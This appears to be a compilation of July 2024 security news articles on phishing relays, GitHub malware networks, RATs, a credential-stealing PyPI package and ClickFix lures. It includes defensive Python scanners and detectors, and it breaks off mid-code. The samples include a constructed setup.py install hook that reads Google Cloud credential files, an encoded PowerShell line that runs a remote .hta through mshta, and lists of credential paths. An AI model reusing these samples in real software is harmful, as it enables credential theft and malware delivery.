The U.S. Cybersecurity and Infrastructure Security Agency (CISA) on Monday added
CVE-2023-45249 to its Known Exploited Vulnerabilities (KEV) catalog, requiring
Federal Civilian Executive Branch (FCEB) agencies to remediate the flaw by
August 19, 2024.
Acronis shared the below statement with The Hacker News following the publication of the story -
The CISA added CVE-2023-45249 to the list of known exploited vulnerabilities. Acronis identified the vulnerability nine months ago, and a security patch was released immediately. Customers running the older version of Acronis Cyber Infrastructure impacted by the vulnerability were promptly informed, provided a patch and recommended upgrading to the new version. Acronis Cyber Protect Cloud, Acronis Cyber Protect and Acronis True Image customers were not affected by the vulnerability.
Proofpoint Email Routing Flaw Exploited to Send Millions of Spoofed Phishing Emails
29.7.24
Exploit The Hacker News
An unknown threat actor has been linked to a massive scam campaign that
exploited an email routing misconfiguration in email security vendor Proofpoint's
defenses to send millions of messages spoofing various popular companies like
Best Buy, IBM, Nike, and Walt Disney, among others.
"These emails echoed from official Proofpoint email relays with authenticated SPF and DKIM signatures, thus bypassing major security protections — all to deceive recipients and steal funds and credit card details," Guardio Labs researcher Nati Tal said in a detailed report shared with The Hacker News.
The cybersecurity company has given the campaign the name EchoSpoofing. The activity is believed to have commenced in January 2024, with the threat actor exploiting the loophole to send as many as three million emails per day on average, a number that hit a peak of 14 million in early June as Proofpoint began to enact countermeasures.
"The most unique and powerful part of this domain is the spoofing method – leaving almost no chance to realize this is not a genuine email sent from those companies," Tal told the publication.
"This EchoSpoofing concept is really powerful. It's kind of strange it is being used for large-scale phishing like this instead of a boutique spear-phishing campaign – where an attacker can swiftly take any real company team member's identity and send emails to other co-workers – eventually, through high-quality social engineering, get access to internal data or credentials and even compromise the entire company."
The technique, which involves the threat actor sending the messages from an SMTP server on a virtual private server (VPS), is notable for the fact that it complies with authentication and security measures such as SPF and DKIM, which are short for Sender Policy Framework and DomainKeys Identified Mail, respectively, and refer to authentication methods that are designed to prevent attackers from imitating a legitimate domain.
It all goes back to the fact that these messages are routed from various
adversary-controlled Microsoft 365 tenants, which are then relayed through
Proofpoint enterprise customers' email infrastructures to reach users of free
email providers such as Yahoo!, Gmail, and GMX.
This is the result of what Guardio described as a "super-permissive misconfiguration flaw" in Proofpoint servers ("pphosted.com") that essentially allowed spammers to take advantage of the email infrastructure to send the messages.
"The root cause is a modifiable email routing configuration feature on Proofpoint servers to allow relay of organizations' outbound messages from Microsoft 365 tenants, but without specifying which M365 tenants to allow," Proofpoint said in a coordinated disclosure report shared with The Hacker News.
"Any email infrastructure that offers this email routing configuration feature can be abused by spammers."
Put differently, an attacker can weaponize the shortcoming to set up rogue
Microsoft 365 tenants and deliver spoofed email messages to Proofpoint's relay
servers, from where they are "echoed back" as genuine digital missives
impersonating the customers' domains.
This, in turn, is accomplished by pointing the rogue tenant's outbound Exchange connector directly at the vulnerable pphosted.com endpoint associated with the targeted customer. Furthermore, a cracked version of legitimate email delivery software called PowerMTA is used for sending the messages.
"The spammer used a rotating series of leased virtual private servers (VPS) from
several providers, using many different IP addresses to initiate quick bursts of
thousands of messages at a time from their SMTP servers, sent to Microsoft 365
to be relayed to Proofpoint-hosted customer servers," Proofpoint said.
"Microsoft 365 accepted these spoofed messages and sent them to these customers' email infrastructures to be relayed. When customer domains were spoofed while relaying through the matching customer's email infrastructure, DKIM signing was also applied as the messages transited through the Proofpoint infrastructure, making the spam messages more deliverable."
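The fix Proofpoint describes, an explicit list of which Microsoft 365 tenants may relay for each customer with everything else denied by default, is a small policy decision at the relay's ingress. The Python below is an added example for this page, not Proofpoint's or Microsoft's code: it evaluates a message against a per-domain tenant allowlist, with a flag that reproduces the original permissive behaviour beside the corrected one. It assumes the relay can identify the originating tenant from the `X-MS-Exchange-CrossTenant-Id` header that Exchange Online stamps on outbound mail and that the relay only accepts connections from Microsoft's sending infrastructure, so that header cannot be forged by an arbitrary SMTP client; a production deployment would confirm that against its own connector configuration. The tenant IDs, domains and messages are constructed placeholders.

```python
from email import message_from_string
from email.utils import parseaddr

# Per-customer relay policy: domains the customer owns, mapped to the Microsoft 365
# tenant IDs permitted to relay mail for them. Both values are constructed placeholders.
RELAY_POLICY = {
    "customer.example": {"0f1c2d3e-1111-4aaa-9bbb-000000000001"},
}


def sender_domain(msg):
    return parseaddr(msg.get("From", ""))[1].rpartition("@")[2].lower()


def relay_decision(raw_message, policy=RELAY_POLICY, enforce_tenant=True):
    """Decide whether an outbound relay should accept, DKIM-sign and forward a message.

    enforce_tenant=False reproduces the permissive behaviour described above (any
    Microsoft 365 tenant may relay for any hosted domain); True is the corrected form.
    The originating tenant is read from X-MS-Exchange-CrossTenant-Id, which this
    example assumes is trustworthy because the relay only accepts mail from Microsoft.
    """
    msg = message_from_string(raw_message)
    domain = sender_domain(msg)
    tenant = (msg.get("X-MS-Exchange-CrossTenant-Id") or "").strip().lower()
    if domain not in policy:
        return {"action": "reject", "reason": f"{domain!r} is not a hosted domain"}
    if not enforce_tenant or tenant in policy[domain]:
        return {"action": "relay_and_dkim_sign", "domain": domain, "tenant": tenant}
    return {"action": "reject", "reason": f"tenant {tenant!r} not authorised for {domain!r}"}


def sample_message(tenant_id):
    """Constructed message: a spoofed-looking From, with the originating tenant varied."""
    return (
        "From: Billing <billing@customer.example>\r\n"
        "To: victim@example.net\r\n"
        f"X-MS-Exchange-CrossTenant-Id: {tenant_id}\r\n"
        "Subject: Your invoice\r\n"
        "\r\n"
        "constructed body\r\n"
    )


LEGIT = sample_message("0f1c2d3e-1111-4aaa-9bbb-000000000001")   # the customer's own tenant
ROGUE = sample_message("deadbeef-2222-4ccc-8ddd-000000000002")   # an attacker-controlled tenant

if __name__ == "__main__":
    print("legit, enforced :", relay_decision(LEGIT))
    print("rogue, enforced :", relay_decision(ROGUE))
    print("rogue, permissive:", relay_decision(ROGUE, enforce_tenant=False))
```

The important property is the default: an empty allowlist must mean "relay for nobody", not "relay for everybody". The permissive path shows why SPF and DKIM passed in the campaign; the relay never asked who was speaking for the domain before it signed.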
It is suspected that EchoSpoofing was deliberately chosen by the operators as a way to generate illegal revenue while avoiding exposure for extended periods of time, as directly targeting the spoofed companies via this modus operandi could have drastically increased the chances of getting detected, effectively imperiling the entire scheme.
That having been said, it's currently not clear who is behind the campaign. Proofpoint said the activity does not overlap with any known threat actor or group.
"In March, Proofpoint researchers identified spam campaigns being relayed through a small number of Proofpoint customers' email infrastructure by sending spam from Microsoft 365 tenants," it said in a statement. "All analyses indicate this activity was conducted by one spam actor, whose activity we do not attribute to a known entity."
"Since discovering this spam campaign, we have worked diligently to provide corrective instructions, including implementing a streamlined administrative interface for customers to specify which M365 tenants are allowed to relay, with all other M365 tenants denied by default."
Proofpoint emphasized that no customer data was exposed, nor did any of them experience loss of data, as a result of these campaigns. It further noted that it reached out to some of its customers directly to change their settings to stop the effectiveness of the outbound relay spam activity.
"As we started to block the spammer's activity, the spammer accelerated its testing and moved quickly to other customers," the company pointed out. "We established a continuous process of identifying the customers affected each day, re-prioritizing outreach to fix configurations."
To cut down on spam, it's urging VPS providers to limit their users' ability to send large volumes of messages from SMTP servers hosted on their infrastructure. It's also calling on email service providers to restrict the capabilities of free trial and newly created unverified tenants to send bulk outbound email messages as well as prevent them from sending messages that spoof a domain for which they do not have proven ownership.
"For CISOs, the main takeaway here is to take extra care of their organization's cloud posture – specifically with the use of 3rd party services that become the backbone of your company's networking and communication methods," Tal said. "Specifically in the realm of emails, always maintain a feedback loop and control of your own – even if you trust your email provider fully."
"And as for other companies providing this kind of backbone services – just like Proofpoint did, they must be vigilant and proactive in thinking of all possible types of threats in the first place. Not only threats that directly affect their customers but the wider public as well.
"This is crucial for the safety of all of us and companies that create and operate the backbone of the internet, even if privately held, have the highest responsibility on it. Just like one said, in a different context entirely yet so relevant here: 'With great powers, comes great responsibility.'"
'Stargazer Goblin' Creates 3,000 Fake GitHub Accounts for Malware Spread
29.7.24
Virus The Hacker News
A threat actor known as Stargazer Goblin has set up a network of inauthentic GitHub accounts to fuel a Distribution-as-a-Service (DaaS) that propagates a variety of information-stealing malware, netting them $100,000 in illicit profits over the past year.
The network, which comprises over 3,000 accounts on the cloud-based code hosting platform, spans thousands of repositories that are used to share malicious links or malware, per Check Point, which has dubbed it "Stargazers Ghost Network."
Some of the malware families propagated using this method include Atlantida Stealer, Rhadamanthys, RisePro, Lumma Stealer, and RedLine, with the bogus accounts also engaged in starring, forking, watching, and subscribing to malicious repositories to give them a veneer of legitimacy.
The network is believed to have been active since August 2022 in some preliminary form, although an advertisement for the DaaS wasn't spotted on the dark web until early July 2023.
"Threat actors now operate a network of 'Ghost' accounts that distribute malware via malicious links on their repositories and encrypted archives as releases," security researcher Antonis Terefos explained in an analysis published last week.
"This network not only distributes malware but also provides various other activities that make these 'Ghost' accounts appear as normal users, lending fake legitimacy to their actions and the associated repositories."
Different categories of GitHub accounts are responsible for distinct aspects of the scheme in an attempt to make their infrastructure more resilient to takedown efforts by GitHub when malicious payloads are flagged on the platform.
These include accounts that serve the phishing repository template, accounts providing the image for the phishing template, and accounts that push malware to the repositories in the form of a password-protected archive masquerading as cracked software and game cheats.
Should the third set of accounts be detected and banned by GitHub, Stargazer Goblin moves to update the first account's phishing repository with a new link to a new active malicious release, thereby allowing the operators to move forward with minimal disruption.
Besides liking new releases from multiple repositories and committing changes to the README.md files to modify the download links, there is evidence to suggest that some accounts in the network were previously compromised, with the credentials likely obtained via stealer malware.
"Most of the time, we observe that Repository and Stargazer accounts remain unaffected by bans and repository takedowns, whereas Commit and Release accounts are typically banned once their malicious repositories are detected," Terefos said.
"It's common to find Link-Repositories containing links to banned Release-Repositories. When this occurs, the Commit account associated with the Link-Repository updates the malicious link with a new one."
One of the campaigns discovered by Check Point involves the use of a malicious link to a GitHub repository that, in turn, points to a PHP script hosted on a WordPress site, which then delivers an HTML Application (HTA) file to ultimately execute Atlantida Stealer by means of a PowerShell script.
Other malware families propagated via the DaaS are Lumma Stealer, RedLine Stealer, Rhadamanthys, and RisePro. Check Point further noted that the GitHub accounts are part of a larger DaaS solution that operates similar 'Ghost' accounts on other platforms such as Discord, Facebook, Instagram, X, and YouTube.
"Stargazer Goblin created an extremely sophisticated malware distribution operation that avoids detection as GitHub is considered a legitimate website, bypasses suspicions of malicious activities, and minimizes and recovers any damage when GitHub disrupts their network," Terefos said.
"Utilizing multiple accounts and profiles performing different activities from starring to hosting the repository, committing the phishing template, and hosting malicious releases, enables the Stargazers Ghost Network to minimize their losses when GitHub performs any actions to disturb their operations as usually only one part of the whole operation is disrupted instead of all the involved accounts."
The development comes as unknown threat actors are targeting GitHub repositories, wiping their contents, and asking the victims to reach out to a user named Gitloker on Telegram as part of a new extortion operation that has been ongoing since February 2024.
The social engineering attack targets developers with phishing emails sent from "notifications@github.com," aiming to trick them into clicking on bogus links under the guise of a job opportunity at GitHub, following which they are prompted to authorize a new OAuth app that erases all the repositories and demands a payment in exchange for restoring access.
It also follows an advisory from Truffle Security that it's possible to access sensitive data from deleted forks, deleted repositories, and even private repositories on GitHub, urging organizations to take steps to secure against what it's calling a Cross Fork Object Reference (CFOR) vulnerability.
"A CFOR vulnerability occurs when one repository fork can access sensitive data from another fork (including data from private and deleted forks)," Joe Leon said. "Similar to an Insecure Direct Object Reference, in CFOR users supply commit hashes to directly access commit data that otherwise would not be visible to them."
In other words, a piece of code committed to a public repository may be accessible forever as long as there exists at least one fork of that repository. On top of that, it could also be used to access code committed between the time an internal fork is created and the repository is made public.
It's however worth noting that these are intentional design decisions taken by GitHub, as noted by the company in its own documentation -
Commits to any repository in a fork network can be accessed from any repository in the same fork network, including the upstream repository.
When you change a private repository to public, all the commits in that repository, including any commits made in the repositories it was forked into, will be visible to everyone.
"The average user views the separation of private and public repositories as a security boundary, and understandably believes that any data located in a private repository cannot be accessed by public users," Leon said.
"Unfortunately, [...] that is not always true. What's more, the act of deletion implies the destruction of data. As we saw above, deleting a repository or fork does not mean your commit data is actually deleted."
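The practical consequence of CFOR is that removing a leaked secret from a repository, or deleting the fork it was pushed to, does not revoke it: the commit that introduced it stays fetchable by SHA from any repository in the fork network. The script below is an added example (not code from Truffle Security or The Hacker News) that walks `git log -p` output, attributes each secret-looking addition to the commit SHA that introduced it, and prints the upstream commit URL that still resolves, so the output is a rotation list rather than a cleanup list. The git log text, the owner and repository names, and the secret value (AWS's documentation placeholder) are constructed for the demonstration, and the patterns are deliberately narrow.

```python
import re
from typing import Dict, List

# Constructed `git log -p` output for a hypothetical public repository. The secret
# value is the well-known AWS documentation placeholder, not a live credential.
SAMPLE_GIT_LOG = """commit 1a2b3c4d5e6f7a8b9c0d1e2f3a4b5c6d7e8f9a0b
Author: Dev <dev@example.com>
Date:   Mon Jun 3 10:00:00 2024 +0000

    add deploy script

diff --git a/deploy.sh b/deploy.sh
+++ b/deploy.sh
+export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+aws s3 sync . s3://example-bucket
commit 0f9e8d7c6b5a4f3e2d1c0b9a8f7e6d5c4b3a2f1e
Author: Dev <dev@example.com>
Date:   Tue Jun 4 10:00:00 2024 +0000

    remove hard-coded key

diff --git a/deploy.sh b/deploy.sh
+++ b/deploy.sh
-export AWS_SECRET_ACCESS_KEY="wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY"
+export AWS_SECRET_ACCESS_KEY="$(vault read -field=key secret/deploy)"
"""

COMMIT_RE = re.compile(r"^commit ([0-9a-f]{40})$", re.MULTILINE)

# Deliberately narrow patterns; a real deployment would use a full secret scanner.
SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_token": re.compile(r"\bgh[pousr]_[A-Za-z0-9]{36}\b"),
    "secret_assignment": re.compile(
        r"(?i)\w*(secret|token|password|api_key)\w*\s*[=:]\s*['\"][A-Za-z0-9/+=_-]{16,}['\"]"
    ),
}


def scan_history(git_log: str) -> Dict[str, List[str]]:
    """Map each commit SHA to the secret patterns found in lines it ADDED.

    Only '+' lines are inspected: a later commit that removes the secret does not
    undo the earlier one, and both stay fetchable by SHA from any fork.
    """
    findings: Dict[str, List[str]] = {}
    parts = COMMIT_RE.split(git_log)  # [preamble, sha1, body1, sha2, body2, ...]
    for sha, body in zip(parts[1::2], parts[2::2]):
        hits = set()
        for line in body.splitlines():
            if not line.startswith("+") or line.startswith("+++"):
                continue
            for name, pattern in SECRET_PATTERNS.items():
                if pattern.search(line):
                    hits.add(name)
        if hits:
            findings[sha] = sorted(hits)
    return findings


def fork_network_urls(owner: str, repo: str, findings: Dict[str, List[str]]) -> List[str]:
    """Upstream commit URLs that keep resolving after the committing fork is deleted,
    because GitHub serves any SHA in the fork network (owner/repo are hypothetical)."""
    return [f"https://github.com/{owner}/{repo}/commit/{sha}" for sha in findings]


if __name__ == "__main__":
    hits = scan_history(SAMPLE_GIT_LOG)
    for url in fork_network_urls("example-org", "example-repo", hits):
        sha = url.rsplit("/", 1)[1]
        print(f"rotate secret(s) introduced in {url}: {hits[sha]}")
```

Feed it `git log -p --all` from a clone of the upstream; every SHA it reports needs the underlying credential rotated, regardless of whether the commit has since been reverted or the branch or fork removed.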
Gh0st RAT Trojan Targets Chinese Windows Users via Fake Chrome Site
29.7.24
Virus The Hacker News
The remote access trojan known as Gh0st RAT has been observed being delivered by an "evasive dropper" called Gh0stGambit as part of a drive-by download scheme targeting Chinese-speaking Windows users.
These infections stem from a fake website ("chrome-web[.]com") serving malicious installer packages masquerading as Google's Chrome browser, indicating that users searching for the software on the web are being singled out.
Gh0st RAT is a long-standing malware that has been observed in the wild since 2008, manifesting in the form of different variants over the years in campaigns primarily orchestrated by China-nexus cyberespionage groups.
Some iterations of the trojan have also been previously deployed by infiltrating poorly-secured MS SQL server instances, using them as a conduit to install the Hidden open-source rootkit.
According to cybersecurity firm eSentire, which discovered the latest activity, the targeting of Chinese-speaking users is based on "the use of Chinese-language web lures and Chinese applications targeted for data theft and defense evasion by the malware."
The MSI installer downloaded from the phony website contains two files, a legitimate Chrome setup executable and a malicious installer ("WindowsProgram.msi"), the latter of which is used to launch shellcode that's responsible for loading Gh0stGambit.
The dropper, in turn, checks for the presence of security software (e.g., 360 Safe Guard and Microsoft Defender Antivirus) before establishing contact with a command-and-control (C2) server in order to retrieve Gh0st RAT.
"Gh0st RAT is written in C++ and has many features, including terminating processes, removing files, capturing audio and screenshots, remote command execution, keylogging, data exfiltration, hiding registry, files, and directories via the rootkit capabilities, and many more," eSentire said.
It's also capable of dropping Mimikatz, enabling RDP on the compromised hosts, accessing account identifiers associated with Tencent QQ, clearing Windows event logs, and erasing data from 360 Secure Browser, QQ Browser, and Sogou Explorer.
The Canadian company said the artifact shares overlaps with a Gh0st RAT variant tracked by the AhnLab Security Intelligence Center (ASEC) under the moniker HiddenGh0st.
"Gh0st RAT has seen widespread use and modification by APT and criminal groups over the past several years," eSentire said. "The recent findings highlight the distribution of this threat via drive-by downloads, deceiving users into downloading a malicious Chrome installer from a deceptive website."
"The continued success of drive-by downloads reinforces the need for ongoing security training and awareness programs."
The development comes as Broadcom-owned Symantec said it observed an increase in phishing campaigns likely leveraging Large Language Models (LLMs) to generate malicious PowerShell and HTML code used to download several loaders and stealers.
The emails contained "code used to download various payloads, including Rhadamanthys, NetSupport RAT, CleanUpLoader (Broomstick, Oyster), ModiLoader (DBatLoader), LokiBot, and Dunihi (H-Worm)," security researchers Nguyen Hoang Giang and Yi Helen Zhang said. "Analysis of the scripts used to deliver malware in these attacks suggests they were generated using LLMs."
French Authorities Launch Operation to Remove PlugX Malware from Infected Systems
28.7.24
BigBrothers The Hacker News
French judicial authorities, in collaboration with Europol, have launched a so-called "disinfection operation" to rid compromised hosts of a known malware called PlugX.
The Paris Prosecutor's Office, Parquet de Paris, said the initiative was launched on July 18 and that it's expected to continue for "several months."
It further said around a hundred victims located in France, Malta, Portugal, Croatia, Slovakia, and Austria have already benefited from the cleanup efforts.
The development comes nearly three months after French cybersecurity firm Sekoia disclosed it had sinkholed a command-and-control (C2) server linked to the PlugX trojan in September 2023 by spending $7 to acquire the IP address. It also noted that nearly 100,000 unique public IP addresses had been sending PlugX requests daily to the seized domain.
PlugX (aka Korplug) is a remote access trojan (RAT) widely used by China-nexus threat actors since at least 2008, alongside other malware families like Gh0st RAT and ShadowPad.
The malware is typically launched within compromised hosts using DLL side-loading techniques, allowing threat actors to execute arbitrary commands, upload/download files, enumerate files, and harvest sensitive data.
"This backdoor, initially developed by Zhao Jibin (aka. WHG), evolved throughout the time in different variants," Sekoia said earlier this April. "The PlugX builder was shared between several intrusion sets, most of them attributed to front companies linked to the Chinese Ministry of State Security."
Over the years, it has also incorporated a wormable component that enables it to propagate via infected USB drives, allowing it to reach air-gapped networks.
Sekoia, which devised a solution to delete PlugX, said variants of the malware with the USB distribution mechanism come with a self-deletion command ("0x1005") to remove itself from compromised workstations, although there is currently no way to remove it from the USB devices themselves.
"Firstly, the worm has the capability to exist on air-gapped networks, which makes these infections beyond our reach," it said. "Secondly, and perhaps more noteworthy, the PlugX worm can reside on infected USB devices for an extended period without being connected to a workstation."
Given the legal complications involved in remotely wiping the malware off the systems, the company further noted that it's deferring the decision to national Computer Emergency Response Teams (CERTs), law enforcement agencies (LEAs), and cybersecurity authorities.
"Following a report from Sekoia.io, a disinfection operation was launched by the French judicial authorities to dismantle the botnet controlled by the PlugX worm. PlugX affected several million victims worldwide," Sekoia told The Hacker News. "A disinfection solution developed by the Sekoia.io TDR team was proposed via Europol to partner countries and is being deployed at this time."
"We are pleased with the fruitful cooperation with the actors involved in France (section J3 of the Paris Public Prosecutor's Office, Police, Gendarmerie and ANSSI) and internationally (Europol and police forces of third countries) to take action against long-lasting malicious cyber activities."
Malicious PyPI Package Targets macOS to Steal Google Cloud Credentials
27.7.24
Virus The Hacker News
Cybersecurity researchers have discovered a malicious package on the Python Package Index (PyPI) repository that targets Apple macOS systems with the goal of stealing users' Google Cloud credentials from a narrow pool of victims.
The package, named "lr-utils-lib," attracted a total of 59 downloads before it was taken down. It was uploaded to the registry in early June 2024.
"The malware uses a list of predefined hashes to target specific macOS machines and attempts to harvest Google Cloud authentication data," Checkmarx researcher Yehuda Gelb said in a Friday report. "The harvested credentials are sent to a remote server."
An important aspect of the package is that it first checks if it has been installed on a macOS system, and only then proceeds to compare the system's Universally Unique Identifier (UUID) against a hard-coded list of 64 hashes.
If the compromised machine is among those specified in the predefined set, it attempts to access two files, namely application_default_credentials.json and credentials.db, located in the ~/.config/gcloud directory, which contain Google Cloud authentication data.
The captured information is then transmitted over HTTP to a remote server "europe-west2-workload-422915[.]cloudfunctions[.]net."
Checkmarx said it also found a fake profile on LinkedIn with the name "Lucid Zenith" that matched the package's owner and falsely claimed to be the CEO of Apex Companies, suggesting a possible social engineering element to the attack.
Exactly who is behind the campaign is currently not known. However, it comes more than two months after cybersecurity firm Phylum disclosed details of another supply chain attack involving a Python package called "requests-darwin-lite" that was also found to unleash its malicious actions after checking the UUID of the macOS host.
These campaigns are a sign that threat actors have prior knowledge of the macOS systems they want to infiltrate and are going to great lengths to ensure that the malicious packages are distributed only to those particular machines.
It also speaks to the tactics malicious actors employ to distribute lookalike packages, aiming to deceive developers into incorporating them into their applications.
"While it is not clear whether this attack targeted individuals or enterprises, these kinds of attacks can significantly impact enterprises," Gelb said. "While the initial compromise usually occurs on an individual developer's machine, the implications for enterprises can be substantial."
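Install-time execution is the usual hook for this kind of package: setuptools lets setup.py register a custom `install` command via `cmdclass`, and whatever its `run()` method does executes on `pip install`, before any of the package's code is ever imported. The scanner below is an added example, not Checkmarx's tooling or the actual lr-utils-lib code; it parses a setup.py with Python's `ast` module and flags the traits the article describes (an install hook, an OS check, and references to credential paths such as `~/.config/gcloud`). The sample setup.py is constructed to exhibit those traits; the UUID source and hash algorithm in it are assumptions, since the report quoted here names neither.

```python
import ast
from typing import List

# Constructed setup.py imitating the install-time hook pattern; it is NOT the
# real lr-utils-lib code. The UUID source (ioreg) and the hash algorithm are
# assumptions for this sample; the article names neither.
SUSPICIOUS_SETUP = '''
import os, platform, hashlib, subprocess
from setuptools import setup
from setuptools.command.install import install

TARGET_HASHES = {"0" * 64}

class CustomInstall(install):
    def run(self):
        install.run(self)
        if platform.system() != "Darwin":
            return
        ioreg = subprocess.check_output(["ioreg", "-rd1", "-c", "IOPlatformExpertDevice"])
        if hashlib.sha256(ioreg).hexdigest() in TARGET_HASHES:
            open(os.path.expanduser("~/.config/gcloud/credentials.db"), "rb").read()

setup(name="lr-utils-lib", version="1.0", cmdclass={"install": CustomInstall})
'''

BENIGN_SETUP = '''
from setuptools import setup
setup(name="harmless", version="0.1", packages=["harmless"])
'''

# setuptools commands whose run() a package can override to execute code on install.
HOOK_BASES = {"install", "develop", "egg_info", "build_py"}
SENSITIVE_PATHS = (".config/gcloud", ".aws/credentials", ".ssh/", ".netrc", ".docker/config.json")
RISKY_MODULES = {"subprocess", "socket", "urllib", "requests", "ctypes"}


def audit_setup_py(source: str) -> List[str]:
    """Statically flag setup.py traits that have no place in a benign package."""
    findings: List[str] = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            bases = {b.id if isinstance(b, ast.Name) else getattr(b, "attr", "") for b in node.bases}
            hooked = bases & HOOK_BASES
            if hooked and any(isinstance(n, ast.FunctionDef) and n.name == "run" for n in node.body):
                findings.append(f"class {node.name} overrides run() of setuptools command {sorted(hooked)}")
        elif isinstance(node, ast.Call):
            func = node.func
            if isinstance(func, ast.Name) and func.id == "setup" and any(k.arg == "cmdclass" for k in node.keywords):
                findings.append("setup() registers cmdclass: custom code runs at install time")
            if (isinstance(func, ast.Attribute) and func.attr == "system"
                    and isinstance(func.value, ast.Name) and func.value.id == "platform"):
                findings.append("platform.system() call: fingerprints the host OS before acting")
        elif isinstance(node, ast.Import):
            for alias in node.names:
                if alias.name.split(".")[0] in RISKY_MODULES:
                    findings.append(f"imports {alias.name} in setup.py")
        elif isinstance(node, ast.ImportFrom):
            if (node.module or "").split(".")[0] in RISKY_MODULES:
                findings.append(f"imports from {node.module} in setup.py")
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            for path in SENSITIVE_PATHS:
                if path in node.value:
                    findings.append(f"references credential path {node.value!r}")
    return findings


if __name__ == "__main__":
    for label, src in (("suspicious", SUSPICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(label, audit_setup_py(src))
```

Running it on an sdist before installation (`pip download --no-binary :all: <pkg>` then unpack) is the point: a wheel has no setup.py and cannot carry this hook, so preferring wheels and auditing sdists covers the vector the article describes. None of the flagged traits are conclusive on their own; their combination in a 59-download package is what warrants a closer look.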
This AI-Powered Cybercrime Service Bundles Phishing Kits with Malicious Android Apps
27.7.24
AI The Hacker News
A Spanish-speaking cybercrime group named GXC Team has been observed bundling phishing kits with malicious Android applications, taking malware-as-a-service (MaaS) offerings to the next level.
Singaporean cybersecurity company Group-IB, which has been tracking the e-crime actor since January 2023, described the crimeware solution as a "sophisticated AI-powered phishing-as-a-service platform" capable of targeting users of more than 36 Spanish banks, governmental bodies, and 30 institutions worldwide.
The phishing kit is priced anywhere between $150 and $900 a month, whereas the bundle including the phishing kit and Android malware is available on a subscription basis for about $500 per month.
Targets of the campaign include users of Spanish financial institutions, as well as tax and governmental services, e-commerce, banks, and cryptocurrency exchanges in the United States, the United Kingdom, Slovakia, and Brazil. As many as 288 phishing domains linked to the activity have been identified to date.
Also part of the spectrum of services offered are the sale of stolen banking credentials and custom coding-for-hire schemes for other cybercriminal groups targeting banking, financial, and cryptocurrency businesses.
"Unlike typical phishing developers, the GXC Team combined phishing kits together with an SMS OTP stealer malware pivoting a typical phishing attack scenario in a slightly new direction," security researchers Anton Ushakov and Martijn van den Berk said in a Thursday report.
What's notable here is that the threat actors, instead of directly making use of a bogus page to grab the credentials, urge the victims to download an Android-based banking app to prevent phishing attacks. These pages are distributed via smishing and other methods.
Once installed, the app requests permission to be set as the default SMS app, thereby making it possible to intercept one-time passwords (OTPs) and other messages and exfiltrate them to a Telegram bot under the attackers' control.
"In the final stage the app opens a genuine bank's website in WebView allowing users to interact with it normally," the researchers said. "After that, whenever the attacker triggers the OTP prompt, the Android malware silently receives and forwards SMS messages with OTP codes to the Telegram chat controlled by the threat actor."
Among the other services advertised by the threat actor on a dedicated Telegram channel are AI-infused voice calling tools that allow its customers to generate voice calls to prospective targets based on a series of prompts directly from the phishing kit.
These calls typically masquerade as originating from a bank, instructing them to provide their two-factor authentication (2FA) codes, install malicious apps, or perform other arbitrary actions.
"Employing this simple yet effective mechanism makes the scam scenario even more convincing to their victims, and demonstrates how rapidly and easily AI tools are adopted and implemented by criminals in their schemes, transforming traditional fraud scenarios into new, more sophisticated tactics," the researchers pointed out.
In a recent report, Google-owned Mandiant revealed how AI-powered voice cloning has the capability to mimic human speech with "uncanny precision," thus allowing for more authentic-sounding phishing (or vishing) schemes that facilitate initial access, privilege escalation, and lateral movement.
"Threat actors can impersonate executives, colleagues, or even IT support personnel to trick victims into revealing confidential information, granting remote access to systems, or transferring funds," the threat intelligence firm said.
"The inherent trust associated with a familiar voice can be exploited to manipulate victims into taking actions they would not normally take, such as clicking on malicious links, downloading malware, or divulging sensitive data."
Phishing kits, which also come with adversary-in-the-middle (AiTM) capabilities, have become increasingly popular as they lower the technical barrier to entry for pulling off phishing campaigns at scale.
Security researcher mr.d0x, in a report published last month, said it's possible for bad actors to take advantage of progressive web apps (PWAs) to design convincing login pages for phishing purposes by manipulating the user interface elements to display a fake URL bar.
What's more, such AiTM phishing kits can also be used to break into accounts protected by passkeys on various online platforms by means of what's called an authentication method redaction attack, which takes advantage of the fact that these services still offer a less-secure authentication method as a fallback mechanism even when passkeys have been configured.
"Since the AitM can manipulate the view presented to the user by modifying HTML, CSS, and images, or JavaScript in the login page, as it is proxied through to the end user, they can control the authentication flow and remove all references to passkey authentication," cybersecurity company eSentire said.
The disclosure comes amid a recent surge in phishing campaigns embedding URLs that are already encoded using security tools such as Secure Email Gateways (SEGs) in an attempt to mask phishing links and evade scanning, according to Barracuda Networks and Cofense.
Social engineering attacks have also been observed resorting to unusual methods wherein users are enticed into visiting seemingly legitimate-but-compromised websites and are then asked to manually copy, paste, and execute obfuscated code into a PowerShell terminal under the guise of fixing issues with viewing content in a web browser.
Details of the malware delivery method have been previously documented by ReliaQuest and Proofpoint. McAfee Labs is tracking the activity under the moniker ClickFix.
"By embedding Base64-encoded scripts within seemingly legitimate error prompts, attackers deceive users into performing a series of actions that result in the execution of malicious PowerShell commands," researchers Yashvi Shah and Vignesh Dhatchanamoorthy said.
"These commands typically download and execute payloads, such as HTA files, from remote servers, subsequently deploying malware like DarkGate and Lumma Stealer."
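Because ClickFix ends with the victim running an encoded PowerShell one-liner themselves, the chain is visible in process-creation telemetry (Windows Security event 4688 with command-line auditing enabled, or Sysmon event 1). The detection below is an added example and not McAfee's logic: it finds `-EncodedCommand`/`-enc` arguments, decodes the UTF-16LE base64 payload, and flags scripts that reach for `mshta`, `.hta` files or in-memory download-and-execute primitives, while noting when the parent process indicates a user typed or pasted the command. The events, URLs and the list of interactive parent processes are constructed assumptions for the demonstration.

```python
import base64
import re
from typing import Dict, List, Optional


def encode_ps(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str) -> str:
    return base64.b64decode(blob).decode("utf-16-le", errors="replace")


# Constructed process-creation records (parent image, command line); not real telemetry.
# Hostnames use the reserved .invalid TLD.
SAMPLE_EVENTS = [
    {"parent": "explorer.exe",
     "cmd": "powershell.exe -w hidden -enc " + encode_ps('$u="http://example.invalid/fix.hta"; mshta $u')},
    {"parent": "services.exe",
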